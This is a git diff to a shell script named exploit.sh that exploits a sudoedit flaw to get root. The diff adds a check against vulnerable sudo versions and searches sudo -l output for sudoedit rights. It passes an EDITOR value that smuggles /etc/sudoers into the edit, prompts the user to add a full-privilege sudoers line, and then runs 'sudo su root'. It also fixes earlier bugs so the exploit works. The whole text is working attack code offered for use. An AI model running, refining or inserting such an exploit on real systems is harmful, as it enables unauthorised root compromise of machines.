diff --git a/exploit.sh b/exploit.sh index 7333f59..078dd2e 100644 --- a/exploit.sh +++ b/exploit.sh @@ -18,15 +18,24 @@ # attacker to add a line to gain privileges on all the files and get a root # shell. -EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-) +if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' +then + echo "> Currently installed sudo version is not vulnerable" + exit 1 +fi + +EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-) if [ -z "$EXPLOITABLE" ]; then - echo "> This user can't run sudoedit as root" + echo "> It doesn't seem that this user can run sudoedit as root" + read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 else echo "> BINGO! User exploitable" echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" echo "$USER ALL=(ALL:ALL) ALL" read -n 1 -s -r -p "Press any key to continue..." - EDITOR = "vim -- /etc/suoders" $EXPLOITABLE + EDITOR="vim -- /etc/sudoers" $EXPLOITABLE sudo su root + exit 0 fi +